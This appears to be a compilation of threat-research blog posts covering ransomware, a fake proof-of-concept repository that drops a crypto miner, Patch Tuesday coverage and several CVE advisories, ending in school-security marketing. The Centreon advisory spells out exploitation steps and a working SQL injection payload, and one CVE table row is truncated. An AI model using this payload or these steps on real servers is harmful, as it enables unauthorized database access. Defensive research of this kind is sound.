Key Group Russian Ransomware Gang Uses Extensive Multi-purpose Telegram Channel

The SonicWall Capture Labs threat research team has been recently tracking ransomware known as Key Group. Key Group is a Russian-based malware threat group that was formed in early 2023.  They have reportedly attacked various organizations around the world by encrypting files and exfiltrating data before using Telegram channels to negotiate ransom payments.  The malware is written in .NET and is created using the Chaos ransomware builder.

Infection Cycle

Upon infection, files on the system are encrypted and each file name is given an extension consisting of five random alphanumeric characters.

Disassembling the file reveals a list of targeted file types:

Figure 1: Targeted files

We can also see a list of processes which will be killed if running:

Figure 2: Targeted processes to kill

It disables system recovery:

Figure 3: Disables system recovery

It contains a whitelist of files to ignore:

Figure 4: Whitelisted files

After encrypting files, the following message is displayed on the desktop background:

Figure 5: Desktop message

The following files are written to the filesystem:

C:\SystemID\keygroup777.txt

C:\SystemID\PersonalID.txt.UF4TA

keygroup777.inf does not exist, but Keygroup777.txt does.  It contains the following ransom message:

Figure 6: Ransom note

The first Github.io link leads to the following page:

Figure 7: First Github link

The “Login” button leads to the following page:

Figure 8: After “Log in”

It automatically redirects to the following page:

Figure 9: Redirected page

The last link in the ransom note leads to the following webpage:

Figure 10: Key Group ransom page

Figure 11: The ransom page continued

@SpyWareSpyNet and keygroup777Rezerv1 are handles for communicating with operators on the Telegram online chat network.

The two buttons lead to the following pages:

Figure 12: “About yourself” button

Figure 13: “Satana” button

The page above plays an audio track called T.A.t.i (feat. Ddeks) from ЧИЧ

The @SpyWareSpyNet Telegram handle leads to the following channel.  It contains links that eventually lead to the contact information of various operators:

Figure 14: Telegram channel for operator communication

Figure 15: Operator contact information

The Telegram channels are also used by many operators to share information on victims, contact information, tools and more.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Keygroup777.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hold – Verify – Execute: Rise of Malicious POCs Targeting Security Researchers

As seen in Cybersecurity Insiders.

Overview

While investigating CVE-2024-5932, a code injection vulnerability in the GiveWP WordPress plugin, our team encountered a malicious Proof of Concept (POC) targeting cybersecurity professionals. This has become a growing threat to cybersecurity professionals from threat actors to achieve their motives, such as crypto mining, data exfiltration and backdoor installation. We have dissected an instance we encountered and felt it important to share to help bring awareness to this problem.  While security researchers are often very well equipped to handle and detect this situation, it is easy to become overconfident, leading to compromise.

Security researchers often need to verify publicly available POCs to accomplish their various tasks, and GitHub is a hotspot for such POCs. POCs on GitHub are widely considered reliable due to their ease of accessibility and the website’s reputation. Should defenders execute a script without thoroughly vetting it? The subsequent sections will elaborate on why it is critical for researchers to be extra vigilant while leveraging such scripts. For the specific example used in this blog, SonicWall has created a signature to ensure the protection of our customers’ IPS: 4496 XMRig Crypto Mining Activity.  It’s important to recognize the larger threat is not one specific example but the technique being used to target security researchers.

Analysis of a Real-world Sample

Initially, there was only a single instance of POC for CVE-2024-5932 by EQSTLab, which is a legitimate one. However, after a few hours, a couple of similar instances popped up, which looked like replicas of the original repository at first glance. The links of those repositories (taken down at the moment) are as follows.

http[s]://github[.]com/niktoproject/CVE-2024-5932 (malicious repo)
http[s]://github[.]com/sqlmap-projects/CVE-2024-5932 (malicious repo)

A screenshot of one of the instances can be seen in Figure 1.

Figure 1: Screengrab of the malicious POC repository

Although such instances are not unusual, we decided to dig into them out of curiosity. It unveiled the addition of a discreet malicious code in the script, as seen in Figure 2.

Figure 2: Evil code from POC script

This malicious code is executed when the script is run for the first time by the victim and performs the following tasks.

  • It clones the specified malicious script from the repository (http[s]://github[.]com/niktoproject/c/blob/main/c[.]sh – malicious), which contains crypto mining code.
  • It makes the script executable and runs it
  • It deletes the script

The cloned malicious script that uses XMRig miner to mine Monero can be seen in Figure 3.

Figure 3: Crypto mining code

The above code performs the following tasks.

  • Downloads the miner and saves the executable file into a hidden directory and a hidden file at /home/<user_name>/.xconfig/.x path
  • Collects information of the machine resources, such as RAM and CPU, to use as a unique identifier
  • Creates a cronjob to make sure the mining process persists across reboots
  • Cleans temporary files to evade suspicion
  • Executes the miner

Indicators of Compromise (IOCs)

If someone has (accidentally) executed the malicious script, it can be identified using the indicators below.

  • Look for the process named “.x”, which consumes the maximum resources, as seen in Figure 4.

Figure 4: Crypto mining process

  • Check the cronjob list to see if the malicious cronjob is created
  • Observe the outgoing network connections going on the specified port in the script, as seen in Figure 5

Figure 5: Network connection originated by mining process

Steps to Remove the Miner

The below steps can be followed to remove the miner.

  • Kill the process “.x” shown in Figure 4
  • Delete the miner executable from /home/<user_name>/.xconfig/.x
  • Remove the cronjob

Best Practices

Following are some established practices that can aid researchers in improving their security posture.

  • Always use isolated VMs and networks to do research or work.
  • Execute but verify! Run scripts only after vetting them thoroughly.
  • Never use the host machine to test anything.
  • Check the “Issues” section of the suspected repository. Some good souls may likely have warned the users.

Flagging on Social Media

Some researchers also flagged this issue on the social media platform “X,” as seen in the links below.

https://x.com/win3zz/status/1828704644987511107
https://x.com/nav1n0x/status/1828715567785636112

Conclusion

Although researchers will undoubtedly need to use public POCs, their execution ought to be done with utmost caution to avoid dire consequences and severe attacks such as ransomware, data exfiltration, spoofing and botnets.

MITRE ATT&CK Mapping

Resource Development Initial Access Execution Persistence Defense Evasion Discovery Impact
T1588.005 T1189 T1204.002 T1053.003 T1070.004 T1082 T1496
 Obtain Capabilities: Exploits Drive-by Compromise  User Execution: Malicious File Scheduled Task/Job: Cron  Indicator Removal: File Deletion  System Information Discovery Resource Hijacking

Figure 6: MITRE ATT&CK mapping

Microsoft Security Bulletin Coverage For September 2024

Overview

Microsoft’s September 2024 Patch Tuesday has 79 vulnerabilities, of which 30 are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2024 and has produced coverage for 9 of the reported vulnerabilities.

Vulnerabilities with Detections

CVE CVE Title Signature
CVE-2024-38217 Windows Mark of the Web Security Feature Bypass Vulnerability ASPY 7007 Malformed-lnk lnk.MP_5
CVE-2024-38237 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability ASPY 7004 Exploit-exe exe.MP_408
CVE-2024-38238 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 7005 Exploit-exe exe.MP_409
CVE-2024-38241 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 7006 Exploit-exe exe.MP_410
CVE-2024-38242 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 602 Exploit-exe exe.MP_411
CVE-2024-38243 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 603 Exploit-exe exe.MP_412
CVE-2024-38244 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 604 Exploit-exe exe.MP_413
CVE-2024-38245 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 605 Exploit-exe exe.MP_414
CVE-2024-43461 Windows MSHTML Platform Spoofing Vulnerability IPS 4501 Windows MSHTML Platform Spoofing (CVE-2024-43461)

Release Breakdown

The vulnerabilities can be classified into following categories:

For September there are 7 critical, 71 Important and one moderate vulnerabilities.

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE CVE Title
CVE-2024-38230 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-38232 Windows Networking Denial of Service Vulnerability
CVE-2024-38233 Windows Networking Denial of Service Vulnerability
CVE-2024-38234 Windows Networking Denial of Service Vulnerability
CVE-2024-38235 Windows Hyper-V Denial of Service Vulnerability
CVE-2024-38236 DHCP Server Service Denial of Service Vulnerability
CVE-2024-43466 Microsoft SharePoint Server Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE CVE Title
CVE-2024-37341 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-37965 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-37980 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-38014 Windows Installer Elevation of Privilege Vulnerability
CVE-2024-38046 PowerShell Elevation of Privilege Vulnerability
CVE-2024-38188 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability
CVE-2024-38194 Azure Web Apps Elevation of Privilege Vulnerability
CVE-2024-38216 Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38220 Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38225 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-38237 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38238 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38239 Windows Kerberos Elevation of Privilege Vulnerability
CVE-2024-38240 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
CVE-2024-38241 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38242 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
8243 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38244 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38245 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38246 Win32k Elevation of Privilege Vulnerability
CVE-2024-38247 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38248 Windows Storage Elevation of Privilege Vulnerability
CVE-2024-38249 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38250 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38252 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-38253 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-43457 Windows Setup and Deployment Elevation of Privilege Vulnerability
CVE-2024-43465 Microsoft Excel Elevation of Privilege Vulnerability
CVE-2024-43470 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability
CVE-2024-43492 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE CVE Title
CVE-2024-37337 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-37342 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-37966 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-38254 Windows Authentication Information Disclosure Vulnerability
CVE-2024-38256 Windows Kernel-Mode Driver Information Disclosure Vulnerability
CVE-2024-38257 Microsoft AllJoyn API Information Disclosure Vulnerability
CVE-2024-38258 Windows Remote Desktop Licensing Service Information Disclosure Vulnerability
CVE-2024-43458 Windows Networking Information Disclosure Vulnerability
CVE-2024-43474 Microsoft SQL Server Information Disclosure Vulnerability
CVE-2024-43475 Microsoft Windows Admin Center Information Disclosure Vulnerability
CVE-2024-43482 Microsoft Outlook for iOS Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE CVE Title
CVE-2024-21416 Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-26186 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-26191 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37335 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37338 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37339 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37340 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-38018 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38045 Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-38119 Windows Network Address Translation (NAT) Remote Code Execution Vulnerability
CVE-2024-38227 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38228 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38231 Windows Remote Desktop Licensing Service Denial of Service Vulnerability
CVE-2024-38259 Microsoft Management Console Remote Code Execution Vulnerability
CVE-2024-38260 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-38263 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43454 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43463 Microsoft Office Visio Remote Code Execution Vulnerability
CVE-2024-43464 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-43467 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43469 Azure CycleCloud Remote Code Execution Vulnerability
CVE-2024-43479 Microsoft Power Automate Desktop Remote Code Execution Vulnerability
CVE-2024-43491 Microsoft Windows Update Remote Code Execution Vulnerability
CVE-2024-43495 Windows libarchive Remote Code Execution Vulnerability

Security Feature Bypass Vulnerabilities

CVE CVE Title
CVE-2024-30073 Windows Security Zone Mapping Security Feature Bypass Vulnerability
CVE-2024-38217 Windows Mark of the Web Security Feature Bypass Vulnerability
CVE-2024-38226 Microsoft Publisher Security Features Bypass Vulnerability
CVE-2024-43487 Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE CVE Title
CVE-2024-43455 Windows Remote Desktop Licensing Service Spoofing Vulnerability
CVE-2024-43461 Windows MSHTML Platform Spoofing Vulnerability
CVE-2024-43476 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2024-23119: Critical SQL Injection Vulnerability in Centreon

Overview

The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability.

CVE-2024-23119 is a high-severity SQL Injection vulnerability in Centreon, impacting Centreon Web versions prior to 22.10.17, 23.04.13, and 23.10.5. Centreon is a widely used network, system and application monitoring tool. This issue resides within the insertGraphTemplate function, which fails to properly validate user inputs before incorporating them into SQL queries. As a result, authenticated attackers can execute arbitrary SQL commands, potentially gaining control over the database and executing code within the context of the service account. The vulnerability is categorized with a CVSS base score of 8.8, reflecting a high risk due to its potential impact on confidentiality, integrity and availability. The exploit prediction scoring system (EPSS) estimates a 0.07% chance of exploitation in the next 30 days, indicating it is less likely but still notable. This vulnerability was initially reported by Zero Day Initiative (ZDI) as ZDI-CAN-22339 and has been addressed in Centreon Web versions 22.10.15, 23.04.10, and 23.10.1. For further details and mitigation, refer to the advisory provided by ZDI and the Centreon GitHub repository.

Technical Overview

CVE-2024-23119 stems from an SQL Injection issue occurring during the creation of graph templates. Centreon utilizes a web interface that communicates over HTTP/HTTPS. The vulnerability is identified in the formGraphTemplate.php and insertGraphTemplateInDB() functions, which are executed through main.get.php (see Figure 1). The core issue arises from inadequate validation and sanitization of specific request parameters that are used to construct SQL queries.

Figure 1: Code Snippet from ‘main.get.php’

When a graph template is created, an HTTP POST request is sent to main.get.php with parameters including p, o and submitA. The formGraphTemplate.php script processes these parameters and invokes the insertGraphTemplateInDB() function (see Figure 2), which then calls insertGraphTemplate().

Figure 2: Code Snippet from ‘formGraphTemplate.php’

In this function, an SQL query is constructed to insert data into the giv_graphs_template table. While some parameters are sanitized, others like lower_limit, upper_limit, size_to_max, default_tpl1, and scaled are directly incorporated into the SQL query without proper sanitization (see Figure 3). This lack of sanitization permits attackers to inject arbitrary SQL commands.

Figure 3: Code snippet from ‘insertgraphTemplate() in DB-Func.php’

Exploiting this SQL Injection vulnerability allows a remote, authenticated attacker to craft malicious requests to the server, leading to potential data leakage, data corruption or full control over the database. This vulnerability highlights the importance of rigorous input validation and the use of parameterized queries to prevent such critical security issues in web applications.

Triggering the Vulnerability

  • Send Malicious POST Requests: An attacker can trigger the vulnerability by sending a specially crafted HTTP POST request to the Centreon web interface. This request must include malicious SQL payloads in parameters that are not properly sanitized.
  • Exploit Unsanitized Parameters: The vulnerability arises from insufficient input validation in the lower_limit, upper_limit, size_to_max, default_tpl1, and scaled An attacker can trigger this vulnerability by injecting SQL commands into these parameters when creating or modifying graph templates.
  • Access via Graph Template Interface: The attack must be executed through the graph template creation or modification interface, specifically by setting the request parameter p to “20404” and other relevant parameters to trigger the vulnerable code path.
  • Authenticated Access Required: The attacker must have authenticated access to the Centreon web interface. This means the attacker needs to log in and have the appropriate permissions to create or modify graph templates to exploit this vulnerability effectively.

Exploitation

Exploiting CVE-2024-23119 involves a series of methodical steps to leverage the SQL injection vulnerability in the Centreon web management interface., The attacker must first authenticate to the Centreon API by sending a POST request to the /api/latest/authentication/providers/configurations/local endpoint. This request includes a JSON payload with valid credentials to gain access to the server’s API.

Figure 4: CSRF Token

Next, the attacker retrieves a CSRF token from the /main.get.php?p=20404&o=a endpoint (see Figure 4), which is necessary for making authenticated requests. The CSRF token is extracted from the HTML response using a regular expression to ensure that subsequent interactions with the server are authorized. With the token in hand, the attacker crafts a malicious payload designed to exploit the SQL injection vulnerability. This payload is injected into specific fields, such as lower_limit, upper_limit, size_to_max, default_tpl1, or scaled, in a graph template creation request. For example, a crafted payload like 1′, NULL, 0, NULL, NULL, ‘0’, NULL, NULL); CREATE TABLE poc (id int); # could be used to create a new table named poc in the database.

Figure 5: Exploitation using SQL injection

Finally, the attacker sends the malicious request to the /main.get.php?p=20404 endpoint with the payload and necessary parameters, including the CSRF token. Upon successful execution of the payload, the attacker verifies the impact by checking the database for changes, such as the presence of the newly created table. This initial access can be leveraged for further exploitation, potentially leading to more severe consequences like data breaches or unauthorized access.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 20295 Centreon main.get.php SQL Injection 9

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Upgrade to Centreon Web versions 22.10.15, 23.04.10, or 23.10.1
  • Monitor and review system logs for suspicious activity.
  • Utilize up-to-date IPS signatures to filter network traffic.
  • Restrict user privileges and sanitize user inputs.

Relevant Links

CVE-2024-7928: FastAdmin Unauthenticated Path Traversal Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of an unauthenticated directory traversal vulnerability affecting FastAdmin installations. Identified as CVE-2024-7928 and with a moderate score of 5.3 CVSSv3, the vulnerability is more severe than it initially appears. Labeled as a path traversal vulnerability and categorized as CWE-22 – this vulnerability allows unauthenticated attackers to traverse the file system.

A proof of concept is publicly available on GitHub, affecting FastAdmin versions up to 1.3.3.20220121. An attacker could perform a path traversal on FastAdmin instances, retrieving database details and exposing sensitive information.  Users are strongly encouraged to update to version 1.3.4.20220530.

Technical Overview

FastAdmin is an open-source backend framework based on two mainstream technologies: ThinkPHP and Bootstrap. It has powerful functions such as a complete permission management system and one-click CRUD generation. The CVE-2024–7928 PoC attempts to retrieve DB credentials for FastAdmin instances. This issue can be exploited remotely and could lead to unauthorized access to sensitive data, posing a risk to organizational security due to its low complexity and minimal privileges required for exploitation.

Figure 1 shows utilizing of the path traversal vulnerability by crafting a GET request to the /index/ajax/lang URI and manipulating the “lang” argument.

Figure 1: CVE-2024-7928 attack request

Exploiting the vulnerability

A crafted GET request to a vulnerable FastAdmin instance is necessary and sufficient to exploit the issue. An attacker only needs to be able to access the instance remotely, which could be over the Internet or a local network. A working PoC with a crafted GET request aids in exploiting this vulnerability. Figure 2 is a demonstration of exploitation leveraging the publicly available PoC.

Figure 2: CVE-2024-7928 Exploitation

Once the exploit is successful, an attacker can use stolen credentials with a MySQL utility tool to access, manipulate, and expose sensitive information, as shown in Figure 3.

Figure 3: CVE-2024-7928 post exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:20259 – FastAdmin Path Traversal

Remediation Recommendations

According to the advisory, considering the severe consequences of this vulnerability and the trend of nefarious activists trying to leverage the exploit in the wild, users are strongly encouraged to upgrade their FastAdmin instances to version 1.3.4.20220530 to address the vulnerability.

Relevant Links

AutoIT Bot Targets Gmail Accounts First

Summary

This week, the SonicWall Capture Labs threat research team observed an AutoIT-compiled executable that attempts to open Gmail login pages via MS Edge, Google Chrome and Mozilla Firefox. It has functionality to read clipboard data, capture keystrokes, run as different users, and restart or shutdown the system. The sample is also capable of detecting debuggers and blocking user input if one is detected, as well as directing control of keyboard and mouse events. It is imperative to be cautious when running files of unknown origin or with vague names such as “File.exe”.  SonicWall customers are protected in the daily update feed via the “MalAgent.AutoITBot” signature.

Technical Analysis

Using the Detect-It-Easy (DIE) tool to review a sample shows the malware as an AutoIT executable. Note the original name was “File.exe”.

Figure 1: DIE Sample detection

Multiple libraries are being imported with no data outside of ordinals identifying the related functions, as well as four separate networking libraries. This indicates the libraries have been obfuscated, and it can be seen by using the DIE tool in Figure 2.

Figure 2: Obfuscated libraries

Using the AutoITExtractor tool we can extract the script shown in Figure 3.  This allows us to see it has cleartext commands to find and launch each browser on a Google sign in page (accounts.google.com)

Figure 3: Extracted script contents

Statically analyzing the binary using a disassembler yields there are no hardcoded addresses that are known to be malicious. While the script has each browser attempt to access Google accounts, there are generic login links for Facebook, Reddit, and other major social media sites. While the browsers launch and execute, a separate function will set up a listening socket if the environment is correct and connectivity has been established as shown in Figure 4.

Figure 4: Socket option setup

The malware will call the standard WSAGetLastError Windows API, as seen during dynamic analysis, if the socket setup fails, as seen in Figure 5.

Figure 5: Socket bind operation (failed)

When the browsers are run, they create multiple processes using the following command line structure:

Figure 6: Browser command line commands

The first process creates a hidden, separate page in Firefox, while the second attempts to open the socket.

Once a connection is made, the functions for keylogging, screen capture and further file enumeration take place. This behavior was not observed during testing, however, and no connection was made by a C2 server.

SonicWall Protections

To ensure SonicWall customers are protected against this threat, the following signature has been released:

  • MalAgent.AutoITBot

IOCs

File.exe

6a4d5fa1f240b1ea51164de317aa376bbc1bbddeb57df23238413c5c21ca9db0

Cisco Smart Software Manager On-Prem Account Takeover

Overview

The SonicWall Capture Labs threat research team became aware of an account takeover vulnerability in Cisco’s Smart Software Manager (SSM), assessed its impact and developed mitigation measures for the vulnerability.  Identified as CVE-2024-20419 and given a perfect CVSS of 10.0, this remote vulnerability allows an attacker to change any user’s account password on the device, including the administrator, without requiring the attacker to be authenticated.  While it is uncertain if the exploit is currently being actively exploited, a publicly available proof of concept code (PoC) is available, making exploitation more likely.  The vulnerability affects Cisco SSM On-Prem software version 8-202206 and earlier.  Cisco advises to upgrade to version 8-202212 with no other known workarounds.

Technical Overview

CVE-2024-20419 is a flaw in the OTP (One-Time Password) generation process within Cisco Smart Software Manager On-Prem. The vulnerability exists in the `/backend/reset_password/generate_code` endpoint. This endpoint is intended to allow a user to verify their identity before obtaining the OTP; however, the application incorrectly includes the OTP in the response before verification is complete. This flaw allows an attacker to use the authorization token before the OTP verification step is completed, bypassing security checks and resetting any user’s passwords, including those of administrators.

Triggering the Vulnerability

Using the publicly available PoC code, we can see that triggering the vulnerability requires two web requests to the SSM – a GET request followed by a POST request.  The GET request, as seen in Figure 1, is used to obtain the required tokens, a XSRF and session token, for the next request.

Figure 1: Obtaining required tokens using GET request

With the appropriate tokens obtained, they can be used to trigger the vulnerability by sending a post request to the vulnerable endpoint `/backend/reset_password/generate_code` as seen in Figure 2.  The vulnerability SSM will return the authentication token in the response which can be parsed out.

Figure 2: Construction POST request to trigger vulnerability

Exploitation

To exploit the information obtained by the vulnerability, the attacker uses the token to send a request to the ‘backend/reset_password’ endpoint, providing the username and authentication token obtained. This allows the attacker to provide a new password. Figure 3 demonstrates the exploitation of this vulnerability by chaining all 3 requests using the public PoC.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 20223 Cisco SSM Admin Password Reset

Remediation Recommendations

Per the Cisco advisory, customers should upgrade to Cisco SSM version 8-202212. Cisco has reported no other known workarounds at this time, so an upgrade is required. Additional industry best practices, such as implementing an IP whitelist, network segmentation and removing internet-facing access would help reduce overall risk despite not completely mitigating the issue.

Relevant Links 

Understanding CVE-2024-38063: How SonicWall Prevents Exploitation

Contributing Researchers: Soumy Das and Hasib Vhora

Overview

CVE-2024-38063 is a critical remote code execution vulnerability in Windows systems with the IPv6 stack, carrying a CVSS score of 9.8. This zero-click, wormable flaw allows attackers to execute arbitrary code remotely via specially crafted IPv6 packets, potentially leading to full system compromise. It affects Windows 10, Windows 11, and Windows Server systems. Microsoft has released patches to mitigate this vulnerability, and it is essential to apply these updates promptly to protect against exploitation. Given the critical nature of this vulnerability and its likely exploitation in the wild, SonicWall has proactively enhanced its firewall and RTDMI products with additional mitigations to protect systems, protecting cases where the patch has not yet been applied.

A Chinese researcher from Cyber KunLun discovered the vulnerability and publicly disclosed by Microsoft in its August 2024 Patch Tuesday release. Due to the simplicity with which an exploit could be crafted, Microsoft has urged users to apply the available patches immediately. Some security experts have incorrectly advised disabling IPv6. While Microsoft clarifies that disabling IPv6 can mitigate the vulnerability, it is not recommended due to potential issues with Windows functionality. Instead, Microsoft advises patching systems immediately.

SonicWall Protections

The SonicWall firewall protects against CVE-2024-38063 by blocking malicious IPv6 fragmented packets by default. This will still occur regardless of whether additional security services are configured, including if deep packet inspection (DPI) is enabled or disabled or if the firewall is configured to allow smaller IPv6 packets. The firewall drops the critical  packet involved in the exploit due to its fragment reassembly logic, which ensures that the packet never reaches the victim machine.  If an exploitation attempt is made, a log may be created depending on the firewall’s configuration showing “IPv6 fragment was dropped”.

Given the wormable nature of this vulnerability, there is a risk that it could be embedded in binaries sent over the network for later exploitation. We’ve strengthened our RTDMI sandboxing solution to safeguard our customers to detect and block Windows or Linux binaries carrying this exploit. This added layer of protection is crucial for identifying and preventing lateral movement and post-exploitation activities by threat actors, ensuring robust security even if some systems remain unpatched.

The Patch

By doing basic patch diffing with the help of Diaphora on the old and new versions of the tcpip.sys driver within Microsoft Windows, it is possible to determine the patch was added to the Ipv6pProcessOptions function.

The additional, conditional logic in the updated version introduces checks before executing IppSendErrorList. The vulnerability takes advantage of an out-of-bound write (OOB) by sending malformed Ipv6 packets. It forces packets to be written to an error list called IppSendErrorList to obtain the correct conditions. The new checks only add packets to the list after the data is validated. Otherwise, it only sends an error without adding the packets to the list memory structure. The patch prevents unintended behavior or exploitation by ensuring that the functions `IppSendError` or `IppSendErrorList` are only called under appropriate conditions, reducing the risk of incorrect or malicious data being processed. This indicates that the vulnerable code likely still exists but is more complicated or potentially impossible to leverage.

How SonicWall Safeguards Today’s Classrooms

As with every other facet of our lives, technology has dramatically revolutionized the world of education. In particular, the how and where learning occurs has been rapidly transformed and these changes have only accelerated. While the use of smartphones and laptops in classroom environments may have been frowned upon just a decade earlier, K-12 education spaces are now increasingly embracing remote and hybrid learning models and using technology to aid in curriculum. With these changes have come unprecedented challenges on the cybersecurity side that demand holistic yet cost-effective solutions to protect and enable students and faculty.

Let’s look at the challenges faced in the K-12 environment and where solutions across SonicWall’s ecosystem can enable a layered security approach to connect and secure modern learning.

Lack of Cybersecurity Expertise and Limited Resources

K-12 schools can be especially vulnerable to threat actors who, with increasing sophistication, are targeting schools. As threats become more advanced and persistent, rising security costs often plague K-12 organizations that are already struggling with limited resources. Many school districts have only a few people who are responsible for the IT needs of hundreds of students and faculty. These IT teams often lack the essential cybersecurity expertise needed to configure and maintain security posture across the many devices and accounts accessed across school districts.

Increased Attack Surfaces

As schools have pivoted to quickly adopting new technologies and more devices to support remote learning, attack surfaces have continued to increase. Chromebooks are taken to and from schools. Individual students, teachers and parents are simultaneously creating accounts to access school resources and networks. Substitute teachers need to be granted quick access to networks, resources and accounts frequently. This expansion of attack surfaces is inevitably leading to unauthorized access to school networks, insufficient visibility into network traffic and potential breaches or ransomware attacks.

Supporting Both In-Person and Virtual Learning

As schools have transitioned to supporting both in-person and virtual learning environments, the connectivity and security requirements needed to enable both have become increasingly complex. For students to learn on campuses, administrators need to juggle the responsibilities of ensuring reliable and fast wireless access to the internet and any school resources. At the same time, for virtual learning students and faculty need to remotely access resources while also being kept safe from threats and inappropriate content off school networks. Managing and monitoring both users that are on campus and remote is vital, yet difficult, with many security and networking solutions being siloed.

Compliance with CIPA

The Children’s Internet Protection Act (CIPA) requires schools that receive federal E-rate discounts to meet several requirements. At the most basic level, CIPA requires the implementation of a content filtering tool to block access to obscene content online. Today, the many devices that are taken to and from campus present a challenge as traditional network level content filtering services are often inadequate and are needed at the endpoint as well.

SonicWall Protects Schools at Every Layer of Security

Given these challenges, it’s clear that a layered security approach is key to securing K-12 environments and enabling modern learning. Siloed tools are no longer adequate and may eventually become a liability rather than an asset for IT teams to manage. SonicWall partners with school districts to provide a layered security approach to ensure the defenses needed in today’s threat landscape while also enabling secure access to resources anywhere and anytime. SonicWall’s ecosystem includes cost-effective and accessible security and networking solutions at all layers.

From firewalls, endpoint security, switches, access points and MDR offerings, here is how SonicWall’s products provide a layered defense to enable learning while protecting faculty, students and staff whether they’re learning on campus or from home:

  • SonicWall’s Next-Generation Firewalls (NGFWs) come in a variety of scalable options that provide the security, control and visibility needed to maintain an effective cybersecurity posture all at a cost that protects limited budgets.
  • At the endpoint, Capture Client is an easy-to-deploy, endpoint security agent powered by a dual-engine that provides a layered defense with protection, detection and response tools bundled in one agent.
  • SonicWall Managed Extended Detection and Response (XDR) is our solution that provides a 24/7/365 SOC staffed by cybersecurity experts to manage tools and critical alerts on any day at any hour of the day. This service provides comprehensive protection and responses against a wide range of cyber threats that schools can be especially vulnerable to and alleviates pressure on already strained IT teams with top-of-line security experts.
  • With SonicWave Access Points (APs), schools can ensure fast and secure internet access across campus, facilitating seamless in-person learning experiences. These provide performance, range, reliability and built-in security features for an enhanced learning experience as the number of connected devices expands in a K-12 environment.
  • SonicWall Switches enable high-speed switching which secures connectivity for modern classrooms. They seamlessly integrate with the SonicWall ecosystem to provide a unified security posture while ensuring the best user experiences.
* Both SonicWall NGFWs and Capture Client have content filtering features bundled seamlessly without additional cost to make sure your security infrastructure is compliant with CIPA regulations. For devices that are taken home, Capture Client enables content filtering at the endpoint to restrict access to dangerous websites and maintain compliance both in and out of schools.

SonicWall: Your Partner in Learning

